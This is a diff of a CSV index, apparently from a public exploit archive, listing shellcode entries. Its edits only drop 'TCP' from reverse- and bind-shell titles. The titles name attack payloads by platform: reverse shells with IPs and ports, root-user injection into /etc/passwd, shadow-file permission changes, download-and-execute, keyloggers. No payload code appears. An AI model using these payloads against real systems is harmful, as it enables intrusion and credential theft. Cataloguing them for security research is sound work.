 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
 18197,shellcodes/linux_x86-64/18197.c,"Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
-18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
+18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
 18585,shellcodes/linux_x86-64/18585.s,"Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
 18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
-21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
+21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
 21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
-40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind (/TCP) Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
-40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
 24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
-25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
+25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
 27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
-27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
+27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
 40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
-28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
-40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
+40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
-29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
-40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
+40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
-34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
+34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
 34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
 35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
-35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
-35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
+35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
+35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
 35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
@@ -482,8 +482,8 @@ id,file,description,date,author,type,platform
 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
 36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
@@ -495,7 +495,7 @@ id,file,description,date,author,type,platform
 36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
 36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
 36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
-36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
+36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
 37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
 37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
@@ -503,7 +503,7 @@ id,file,description,date,author,type,platform
 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
-37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
+37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
@@ -520,91 +520,91 @@ id,file,description,date,author,type,platform
 37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
 38065,shellcodes/osx/38065.txt,"OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
-38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
+38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
 38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
-38126,shellcodes/osx/38126.c,"OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
+38126,shellcodes/osx/38126.c,"OSX/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
 38150,shellcodes/linux_x86-64/38150.txt,"Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
-38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
+38194,shellcodes/android/38194.c,"Google Android - Bind (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
 38239,shellcodes/linux_x86-64/38239.asm,"Linux/x64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
-38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
+38469,shellcodes/linux_x86-64/38469.c,"Linux/x64 - Bind (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
 38708,shellcodes/linux_x86-64/38708.asm,"Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
 38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
 38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
-39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
-39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
+39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
+39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
+39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
 39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
 39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
-39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
-39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
+39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
+39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
-39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
-39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
+39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
+39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
 39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
-39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
+39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
 39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
-39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
+39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
 39617,shellcodes/linux_x86-64/39617.c,"Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
 39624,shellcodes/linux_x86-64/39624.c,"Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
 39625,shellcodes/linux_x86-64/39625.c,"Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
-39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
+39684,shellcodes/linux_x86-64/39684.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
 39700,shellcodes/linux_x86-64/39700.c,"Linux/x64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
-39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
+39718,shellcodes/linux_x86-64/39718.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
 40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
-39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
-39728,shellcodes/generator/39728.py,"Linux/x64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
+39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
+39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
+39728,shellcodes/generator/39728.py,"Linux/x64 - Bind (/TCP) Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
 39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
 39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
-39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
-39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
+39758,shellcodes/linux_x86-64/39758.c,"Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
+39763,shellcodes/linux_x86-64/39763.c,"Linux/x64 - Reverse (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
-39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
+39815,shellcodes/generator/39815.c,"Linux/x86 - Bind (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
 39847,shellcodes/linux_x86-64/39847.c,"Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
-39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
+39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
 39869,shellcodes/linux_x86-64/39869.c,"Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
